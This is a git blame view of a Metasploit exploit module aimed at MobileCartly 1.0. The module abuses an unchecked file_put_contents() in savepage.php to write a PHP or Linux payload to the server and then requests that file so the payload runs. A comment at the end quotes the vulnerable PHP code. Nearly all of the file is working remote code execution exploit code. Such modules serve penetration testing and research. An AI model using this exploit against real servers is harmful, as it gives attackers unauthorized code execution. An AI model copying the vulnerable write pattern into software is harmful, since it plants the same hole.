Files
metasploit-gs/modules/exploits/multi/http/mobilecartly_upload_exec.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

121 lines
3.2 KiB
Ruby
Raw Normal View History

2012-09-04 14:23:16 -05:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2012-09-04 14:23:16 -05:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2012-09-04 14:23:16 -05:00
Rank = ExcellentRanking
2013-08-30 16:28:54 -05:00
2012-09-04 14:23:16 -05:00
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
2013-08-30 16:28:54 -05:00
2012-09-04 14:23:16 -05:00
def initialize(info={})
super(update_info(info,
'Name' => "MobileCartly 1.0 Arbitrary File Creation Vulnerability",
'Description' => %q{
This module exploits a vulnerability in MobileCartly. The savepage.php file
does not do any permission checks before using file_put_contents(), which
allows any user to have direct control of that function to create files
under the 'pages' directory by default, or anywhere else as long as the user
has WRITE permission.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Yakir Wizman <yakir.wizman[at]gmail.com>', # Original discovery
'sinn3r' # Metasploit
2012-09-04 14:23:16 -05:00
],
'References' =>
[
[ 'OSVDB', '85509' ],
2013-06-20 06:47:10 -05:00
[ 'EDB', '20422 '],
[ 'BID', '55399 ']
2012-09-04 14:23:16 -05:00
],
'Payload' =>
{
# Goes in the query string, needs to fit in 8k. Leave a little
# exra for the other params and the path.
'Space' => 8000,
'DisableNops' => true
2012-09-04 14:23:16 -05:00
},
'Platform' => %w{ linux php },
2012-09-04 14:23:16 -05:00
'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
],
'Privileged' => false,
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2012-08-10',
2012-09-04 14:23:16 -05:00
'DefaultTarget' => 0))
2013-08-30 16:28:54 -05:00
2012-09-04 14:23:16 -05:00
register_options(
[
OptString.new('TARGETURI', [true, 'The base directory to MobileCartly', '/mobilecartly/'])
])
2012-09-04 14:23:16 -05:00
end
2013-08-30 16:28:54 -05:00
2012-09-04 14:23:16 -05:00
def check
2012-11-08 17:42:48 +01:00
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
2013-08-30 16:28:54 -05:00
2013-01-30 23:23:41 -06:00
res = send_request_raw({'uri'=>normalize_uri(uri, "/index.php")})
2012-09-04 14:23:16 -05:00
if res and res.body =~ /MobileCartly/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
2013-08-30 16:28:54 -05:00
2012-09-04 14:23:16 -05:00
def exploit
#
# Init target path
#
2012-11-08 17:42:48 +01:00
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
2013-08-30 16:28:54 -05:00
2012-09-04 14:23:16 -05:00
#
# Configure payload names
#
php_fname = Rex::Text.rand_text_alpha(5) + ".php"
2013-08-30 16:28:54 -05:00
2012-09-04 14:23:16 -05:00
#
# Upload payload
#
2016-02-01 15:12:03 -06:00
print_status("Uploading payload")
2012-09-04 14:23:16 -05:00
res = send_request_cgi({
2013-01-30 23:23:41 -06:00
'uri' => normalize_uri(base, "/includes/savepage.php"),
2012-09-04 14:23:16 -05:00
'vars_get' => {
'savepage' => php_fname,
'pagecontent' => get_write_exec_payload(:unlink_self=>true)
2012-09-04 14:23:16 -05:00
}
})
2013-08-30 16:28:54 -05:00
2012-09-04 14:23:16 -05:00
if not res
2016-02-01 15:12:03 -06:00
print_error("No response from server, will not continue.")
2012-09-04 14:23:16 -05:00
return
end
2013-08-30 16:28:54 -05:00
2012-09-04 14:23:16 -05:00
#
# Run payload
#
2016-02-01 15:12:03 -06:00
print_status("Requesting '#{php_fname}'")
2013-01-31 01:56:05 -06:00
send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) })
2013-08-30 16:28:54 -05:00
2012-09-04 14:23:16 -05:00
handler
end
end
=begin
*facepalm*
<?php
$page = "../pages/" . $_REQUEST['savepage'];
$content = $_REQUEST['pagecontent'];
file_put_contents($page, $content);
?>
2012-09-05 15:03:30 -05:00
=end